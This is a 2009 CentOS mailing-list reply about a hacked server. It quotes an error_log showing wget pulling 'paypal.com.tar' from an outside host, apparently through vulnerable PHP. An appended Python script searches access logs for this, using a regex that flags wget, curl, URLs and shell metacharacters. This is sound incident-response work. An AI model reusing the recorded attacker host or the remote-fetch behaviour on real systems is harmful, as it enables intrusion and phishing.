[CentOS] httpd - mysql - paypal.com.tar - hacker
John R Pierce
pierce at hogranch.com
Fri Aug 21 21:20:38 UTC 2009
Gregory P. Ennis wrote:
> P.S. I found the following entry in my error_log of /var/log/httpd/ :
>
> [Sun Aug 16 04:26:19 2009] [info] Server built: Jul 14 2009 06:02:39
> --00:21:14-- http://code.go.ro/paypal.com.tar
> Resolving code.go.ro... 81.196.20.134
> Connecting to code.go.ro|81.196.20.134|:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 645120 (630K) [application/x-tar]
> Saving to: `paypal.com.tar'
> ....

looks like they spoofed something on your server, probably some kinda sloppy php, into running wget. I'd take a look at the access_log around the same timestamp to see if there are any hints as to how they did this.

http://xkcd.com/327/
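
One way to do the access_log check suggested above, as an added example that is not part of the original message: it lists every access_log entry whose time of day falls near the wget banner time and flags query strings that look like an attempt to make the server fetch or run something. It assumes Apache common/combined log format; the function names, the marker pattern, the sample paths and the addresses are constructed for illustration.

```python
import re
from datetime import datetime
from urllib.parse import unquote

# Apache common/combined format: host ident user [time] "request" status size
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\] ]+)[^\]]*\] "([^"]*)" (\d{3})')
# Heuristic markers (an assumption, tune for your site) of a query string that
# tries to make the server fetch or execute something.
SUSPICIOUS = re.compile(r'wget|curl|(?:https?|ftp)://|[;|`]|\$\(', re.I)

def seconds_of_day(hms):
    h, m, s = (int(x) for x in hms.split(":"))
    return h * 3600 + m * 60 + s

def requests_near(lines, wget_hms, window_s=120):
    """Return (host, timestamp, request, status, flagged) for every entry whose
    time of day is within window_s of wget_hms. wget's "--HH:MM:SS--" banner
    carries no date, so entries from any day match; the gap wraps at midnight."""
    target = seconds_of_day(wget_hms)
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not access-log entries
        host, ts, request, status = m.groups()
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S")
        gap = abs(when.hour * 3600 + when.minute * 60 + when.second - target)
        if min(gap, 86400 - gap) > window_s:
            continue
        parts = request.split()
        query = parts[1].partition("?")[2] if len(parts) > 1 else ""
        # Decode %xx escapes first: payloads are usually URL-encoded in the log.
        hits.append((host, when, request, int(status), bool(SUSPICIOUS.search(unquote(query)))))
    return hits

# Constructed sample entries (documentation addresses, hypothetical paths).
SAMPLE = [
    '192.0.2.10 - - [17/Aug/2009:00:19:02 -0500] "GET /index.html HTTP/1.1" 200 5120',
    '198.51.100.7 - - [17/Aug/2009:00:21:12 -0500] "GET /gallery/view.php?page=http%3A%2F%2Fexample.invalid%2Fx.txt HTTP/1.0" 200 312',
    '198.51.100.7 - - [17/Aug/2009:00:21:13 -0500] "POST /gallery/view.php HTTP/1.0" 200 0',
    '192.0.2.44 - - [17/Aug/2009:09:30:00 -0500] "GET /about.php?id=3 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for host, when, request, status, flagged in requests_near(SAMPLE, "00:21:14"):
        print("!!" if flagged else "  ", when, host, status, request)
```

POST bodies are not written to the access_log, so a POST inside the window is returned unflagged and still deserves a look at the script it hit.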